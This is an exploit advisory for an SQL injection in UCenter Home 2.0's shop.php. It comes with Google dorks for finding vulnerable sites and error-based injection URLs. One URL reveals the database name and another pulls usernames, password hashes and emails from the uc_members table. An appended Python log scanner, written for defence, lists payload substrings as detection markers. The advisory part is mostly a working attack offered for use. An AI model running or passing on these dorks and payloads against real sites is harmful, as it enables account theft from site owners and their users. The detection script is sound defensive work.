__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DB : Okay.

Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, then edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
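
Added example (not part of the original advisory and not UCenter Home code): a log check for the requests described above, flagging any shop.php request whose shopid is not a plain integer and listing which substrings from the quoted payloads it contains. The combined access-log format, the sample lines and the rule that a legitimate shopid is digits only are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Substrings taken from the payloads quoted in this advisory (lower-cased).
MARKERS = ("information_schema", "floor(rand(", "concat(", "group by", "0x7e")

# Request line of a combined-format access log; tolerates raw spaces in the URL.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines for illustration, not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2024:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(0x7e,database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 900
192.0.2.51 - - [01/Jan/2024:10:00:12 +0000] "GET /shop.php?ac=view&shopid=12' HTTP/1.1" 200 640
"""


def scan(log_text):
    """Return (client, shopid, matched_markers) for each suspicious shop.php request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        url = urlsplit(target)
        # The advisory names the file as both Shop.php and shop.php.
        if not url.path.lower().endswith("/shop.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            if value.isascii() and value.isdigit():
                continue  # assumed legitimate form: a plain integer id
            lowered = value.lower()
            findings.append((client, value, [k for k in MARKERS if k in lowered]))
    return findings


if __name__ == "__main__":
    for client, value, markers in scan(SAMPLE_LOG):
        print(client, repr(value[:40]), markers)
```

A hit with an empty marker list (such as a stray quote) is still worth review, since the integer check alone is what separates normal traffic from tampering on this parameter.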